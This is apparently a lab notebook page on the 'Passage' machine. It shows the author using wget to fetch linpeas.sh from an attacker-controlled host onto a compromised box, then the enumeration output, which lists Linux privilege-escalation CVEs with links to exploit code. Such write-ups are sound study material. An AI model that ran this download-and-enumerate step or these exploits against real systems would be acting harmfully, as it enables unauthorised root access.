InfoSec LAB

Passage_Automated

Created: 2 min read

PEAS

www-data@passage:/tmp$ wget http://10.10.14.4/linpeas.sh ; chmod 755 /tmp/linpeas.sh
--2023-03-17 07:00:52--  http://10.10.14.4/linpeas.sh
connecting to 10.10.14.4:80... connected.
HTTP request sent, awaiting response... 200 OK
length: 827827 (808K) [text/x-sh]
saving to: 'linpeas.sh'
 
linpeas.sh          100%[===================>] 808.42K  1.19MB/s    in 0.7s    
 
2023-03-17 07:00:53 (1.19 MB/s) - 'linpeas.sh' saved [827827/827827]

Delivery complete

Executing PEAS

CVEs

The target system is confirmed to be vulnerable to CVe-2021-4034

╔══════════╣ Executing Linux Exploit Suggester
 https://github.com/mzet-/linux-exploit-suggester
cat: write error: Broken pipe
write error: Broken pipe
write error: Broken pipe
write error: Broken pipe
cat: write error: Broken pipe
write error: Broken pipe
[+] [CVE-2021-4034] PwnKit
 
   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
 
[+] [CVE-2021-3156] sudo Baron Samedit 2
 
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
 
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
 
   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
 
[+] [CVE-2022-2586] nft_object UAF
 
   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: less probable
   Tags: ubuntu=(20.04){kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
 
[+] [CVE-2021-3156] sudo Baron Samedit
 
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: mint=19,ubuntu=18|20, debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
 
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
 
   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
*} Tags: ubuntu=20.04{kernel:5.8.0-
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded
 
[+] [CVE-2019-18634] sudo pwfeedback
 
   Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
   Exposure: less probable
   Tags: mint=19
   Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
   Comments: sudo configuration requires pwfeedback to be enabled.
 
[+] [CVE-2019-15666] XFRM_UAF
 
   Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
   Exposure: less probable
   Download URL: 
   Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled
 
[+] [CVE-2018-1000001] RationalLove
 
   Details: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/
   Exposure: less probable
   Tags: debian=9{libc6:2.24-11+deb9u1},ubuntu=16.04.3{libc6:2.23-0ubuntu9}
   Download URL: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/RationalLove.c
   Comments: kernel.unprivileged_userns_clone=1 required
 
[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64
 
   Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
   Exposure: less probable
   Tags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04,fedora=22|25,centos=7.3.1611
   Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap_64.c
   Comments: Uses "Stack Clash" technique, works against most SUID-root binaries

some more CVEs

USBCreator

peas claims that the target system is vulnerable to the usbcreator exploit

Compilers

Compilers seem to be installed

SUIDs

PEAS also picked up the SUID binaries in a much more detailed manner

Interactive Graph View

Backlinks